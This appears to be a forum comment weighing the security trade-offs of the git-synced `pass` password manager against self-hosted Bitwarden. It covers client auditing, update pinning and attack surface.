First, the clients are open source, so you can scrutinize them to your heart's content. (also true with bitwarden, but the code surface area for BW broader)

The only compromising snippets would be code that tries to do i/o with a decrypted password, which shouldn't be too hard to grep the codebase for. But, yes, this is an insurmountably high barrier to entry for most people.

On the other hand, BW requires constant communication with an API Server, which is much easier to hide compromising code within. Using git to synchronize state, so that no network traffic with an API server is required, is an elegant security advantage to `pass`, imo. The trade-off is that your encrypted secrets are in each of your clients, and the implications of that should be understood.

So, you're comfortable with the code as it is today. What about a nefarious update, that introduces some offensive code? Since the apps are dead-simple, you can comfortably block the app from being automatically upgraded on your phone.

You'll bump into problems when you need to upgrade the app to be compatible with the latest OS, which means you have to redo your audit once-per-year at worst. But at that point, you should be able to do a `git diff`.

In the absolute worst case, you can fork the client, load the app, and make the necessary upgrades yourself. Although, again, this is an insurmountable barrier for most people.

I think self-hosted Bitwarden still has a large attack surface, because they're a .NET + SQLServer application, instead of a dumb wrapper around UNIX tools. Don't get me wrong, UNIX tools have a big surface area, but we're screwed in countless other ways if we assume they're compromised.

I think the trade-offs are pretty debatable in both directions, reasonable people can disagree on the best solution, and the right solution probably depends on the administrator.